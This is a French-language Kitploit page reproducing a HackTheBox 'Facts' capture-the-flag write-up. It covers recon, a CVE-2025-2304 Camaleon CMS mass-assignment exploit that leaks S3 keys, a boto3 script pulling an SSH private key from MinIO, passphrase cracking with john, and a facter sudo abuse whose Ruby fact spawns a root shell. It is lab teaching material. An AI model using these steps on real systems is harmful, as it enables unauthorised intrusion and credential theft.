Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
HTB-Facts-Writeup — HackTheBox Facts machine writeup — CVE-2025-2304, énumération MinIO S3, craquage de clés SSH, et élévation de privilèges via facter. | Kitploit
Outils/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Cassage de Mots de PasseEscalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionSécurité Cloud

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Apprentissage et Éducation
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

HackTheBox Facts machine writeup — CVE-2025-2304, énumération MinIO S3, craquage de clés SSH, et élévation de privilèges via facter.

Voir le dépôt
il y a 3 moisPas encore vérifié

HackTheBox — Write-up de la machine Facts

HackTheBox Difficulty OS

Informations sur la machine

ChampDétails
NomFacts
Système d'exploitationLinux
DifficultéFacile
SortieSaison 10
RetiréeNon

Aperçu de la chaîne d'attaque

root@kitploit:~
Reconnaissance → Énumération Web → CVE-2025-2304 (Mass Assignment) → Fuite d'identifiants S3/MinIO → Extraction de clé SSH → Craquage de phrase de passe → Shell utilisateur → Abus sudo facter → Root

Outils utilisés


Reconnaissance

Scan de ports

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

Résultats :

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

Énumération Web

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

Résultats clés :

  • CMS identifié : Camaleon CMS 2.9.0
  • Panneau d'administration : http://facts.htb/admin/login
  • Page d'inscription : http://facts.htb/admin/register

Accès initial

Étape 1 — Créer un compte

Visitez http://facts.htb/admin/register et créez un compte. Notez qu'il y a un captcha — inscrivez-vous via le navigateur.

Étape 2 — CVE-2025-2304 (Mass Assignment - Élévation de privilèges)

Le point de terminaison updated_ajax utilise permit! permettant de mettre à jour tous les paramètres, y compris le rôle (role).

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

Sortie :

root@kitploit:~
[+] Connexion confirmée
    Rôle actuel de l'utilisateur : client
[+] Rôle utilisateur mis à jour : admin
[+] Extraction des identifiants S3
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

Énumération Cloud — MinIO S3

Le port 54321 exécute un serveur compatible MinIO S3. En utilisant les identifiants divulgués :

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

Fichiers clés trouvés :

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← SSH private key
.profile
.bashrc

Craquage de clé SSH

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Phrase de passe craquée : dragonballz


Shell utilisateur

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Entrez la phrase de passe : dragonballz
root@kitploit:~
cat /home/william/user.txt

Élévation de privilèges

Énumération

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

Exploitation — fait personnalisé facter (exécution de code Ruby)

Facter charge des faits personnalisés sous forme de scripts Ruby. Puisque nous pouvons l'exécuter en tant que root sans mot de passe, nous injectons du code Ruby arbitraire :

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

Shell root obtenu !

root@kitploit:~
whoami   # root
cat /root/root.txt

Points clés à retenir

  • Les vulnérabilités d'assignation en masse (mass assignment) permettent l'élévation de privilèges lorsque les entrées ne sont pas correctement filtrées
  • Des buckets S3/MinIO mal configurés peuvent exposer des fichiers sensibles, y compris des clés privées SSH
  • Les phrases de passe faibles sur les clés SSH peuvent être craquées avec des dictionnaires courants comme rockyou
  • Les binaires sudo NOPASSWD doivent toujours être examinés pour un potentiel d'abus
  • L'enchaînement de petites mauvaises configurations peut mener à un compromis complet du système

Références

  • CVE-2025-2304 — Camaleon CMS Mass Assignment
  • GTFOBins — facter
  • HackTheBox

Ce write-up est à but éducatif uniquement. Effectuez toujours les tests de sécurité sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite.

Télécharger l’outil
OutilObjectif
NmapScan de ports et détection de services
FeroxbusterÉnumération de répertoires web
CVE-2025-2304 PoCÉlévation de privilèges Camaleon CMS
boto3 (Python)Énumération MinIO/S3 et téléchargement de fichiers
ssh2johnConversion de clé SSH en hash craquable
John the RipperCraquage de phrase de passe de clé SSH
facterÉlévation de privilèges via mauvaise configuration sudo